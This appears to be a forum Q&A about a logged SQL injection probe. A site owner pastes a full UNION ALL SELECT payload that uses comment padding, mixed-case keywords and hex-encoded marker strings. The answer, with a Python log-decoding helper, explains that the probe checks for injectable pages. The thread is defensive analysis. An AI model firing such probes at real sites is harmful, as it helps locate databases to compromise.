I have been seeing this SQL injection/attack on one of my servers and would like to know what it is trying to do. I know it's an attack, and after googling it I see it is being used a lot, but I do not see an explanation of what it's doing and what the hex or binary is. Here is the attack:
press-detail.php?id=999999.9+%2f**%2fuNiOn%2f**%2faLl+%2f**%2fsElEcT+0x393133353134353632312e39,0x393133353134353632322e39,0x393133353134353632332e39,0x393133353134353632342e39,0x393133353134353632352e39,0x393133353134353632362e39,0x393133353134353632372e39,0x393133353134353632382e39,0x393133353134353632392e39,0x39313335313435363231302e39,0x39313335313435363231312e39,0x39313335313435363231322e39,0x39313335313435363231332e39,0x39313335313435363231342e39,0x39313335313435363231352e39,0x39313335313435363231362e39,0x39313335313435363231372e39,0x39313335313435363231382e39,0x39313335313435363231392e39,0x39313335313435363232302e39,0x39313335313435363232312e39,0x39313335313435363232322e39,0x39313335313435363232332e39,0x39313335313435363232342e39,0x39313335313435363232352e39,0x39313335313435363232362e39,0x39313335313435363232372e39,0x39313335313435363232382e39,0x39313335313435363232392e39,0x39313335313435363233302e39,0x39313335313435363233312e39,0x39313335313435363233322e39,0x39313335313435363233332e39,0x39313335313435363233342e39,0x39313335313435363233352e39,0x39313335313435363233362e39,0x39313335313435363233372e39,0x39313335313435363233382e39,0x39313335313435363233392e39,0x39313335313435363234302e39,0x39313335313435363234312e39,0x39313335313435363234322e39,0x39313335313435363234332e39,0x39313335313435363234342e39,0x39313335313435363234352e39,0x39313335313435363234362e39,0x39313335313435363234372e39,0x39313335313435363234382e39,0x39313335313435363234392e39,0x39313335313435363235302e39,0x39313335313435363235312e39,0x39313335313435363235322e39,0x39313335313435363235332e39,0x39313335313435363235342e39,0x39313335313435363235352e39,0x39313335313435363235362e39,0x39313335313435363235372e39,0x39313335313435363235382e39,0x39313335313435363235392e39,0x39313335313435363236302e39,0x39313335313435363236312e39,0x39313335313435363236322e39,0x39313335313435363236332e39,0x39313335313435363236342e39,0x39313335313435363236352e39,0x39313335313435363236362e39,0x39313335313435363236372e39,0x39313335313435363236382e39,0x39313335313435363236392e39,0x39313335313435363237302e39,0x39313335313435363237312e39,0x39313335313435363237322e39,0x39313335313435363237332e39+and+'1'='1
What I would like to know is: why "999999.9", and what is "0x39313335313435363237322e39"? When this attack works, what information would the hackers have, or what edits would they have made to the database? Last, could this attack, run over and over again, bring down/crash the server?
Any explanation of this code would be greatly appreciated.
1 solution
#1
6
So, as it's being used a lot, I would submit my answer.
In my opinion, the aim of these requests is to check the presence or absence of a sql injection. This is the part of the query that is trying to inject:
999999.9 UNION ALL SELECT "91351456272.9","91351456272.9",...,"91351456272.9" and '1'='1
The goal of the attacker is to complete the query in this way:
SELECT * FROM table WHERE field=999999.9 UNION ALL SELECT "91351456272.9","91351456272.9",...,"91351456272.9"
If field is not sanitized, and only if the number of columns used in the UNION SELECT matches the number of columns of the query, the string 91351456272.9 will most likely appear somewhere in the page.
That will be the confirmation for the attacker of a vulnerability in the page.
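An added example, not part of the question or of the answer above: a small Python helper that URL-decodes such a request, strips the /**/ comment padding, decodes the 0x literals and counts the UNION SELECT columns, so that from a web log a defender can read off which column count the probe is guessing and which marker strings to look for in the response. The sample request is a constructed cut-down of the question's probe (three columns instead of 73).

```python
import re
from urllib.parse import unquote_plus

# Constructed sample: the probe from the question, cut down to three columns.
SAMPLE_REQUEST = (
    "press-detail.php?id=999999.9+%2f**%2fuNiOn%2f**%2faLl+%2f**%2fsElEcT+"
    "0x393133353134353632312e39,0x393133353134353632322e39,"
    "0x39313335313435363237332e39+and+'1'='1"
)

# MySQL reads 0x... literals as strings in a string context, so the probe
# can carry its marker text without any quote characters.
HEX_LITERAL = re.compile(r"0x([0-9a-fA-F]+)")
# Case-insensitive because the probe mixes case (uNiOn aLl sElEcT) to
# slip past naive keyword filters.
UNION_SELECT = re.compile(
    r"\bunion\b(?:\s+all)?\s+select\b(.*?)(?:\s+and\s+|$)", re.I | re.S
)


def normalize(query_string: str) -> str:
    """URL-decode and replace the /**/ comments that stand in for spaces."""
    decoded = unquote_plus(query_string)
    return re.sub(r"/\*.*?\*/", " ", decoded)


def decode_hex_literals(sql: str) -> list[str]:
    """Decode every 0x... literal to the text it stands for."""
    markers = []
    for match in HEX_LITERAL.finditer(sql):
        digits = match.group(1)
        if len(digits) % 2:          # odd length: MySQL implies a leading 0
            digits = "0" + digits
        markers.append(bytes.fromhex(digits).decode("ascii", "replace"))
    return markers


def analyze(request: str) -> dict:
    """Report what a UNION-based probe in the query string is testing for."""
    sql = normalize(request.split("?", 1)[-1])
    match = UNION_SELECT.search(sql)
    if not match:
        return {"union_probe": False}
    columns = [c for c in match.group(1).split(",") if c.strip()]
    return {
        "union_probe": True,
        "columns": len(columns),                         # column count guessed
        "markers": decode_hex_literals(match.group(1)),  # strings to grep for
        "sql": sql.strip(),                              # readable form for the log
    }
```

Run `analyze()` over the `id=` requests in your access log: the decoded markers are the exact strings to search for in the served HTML, and if one appears there the column count in that request is the one the injection matched.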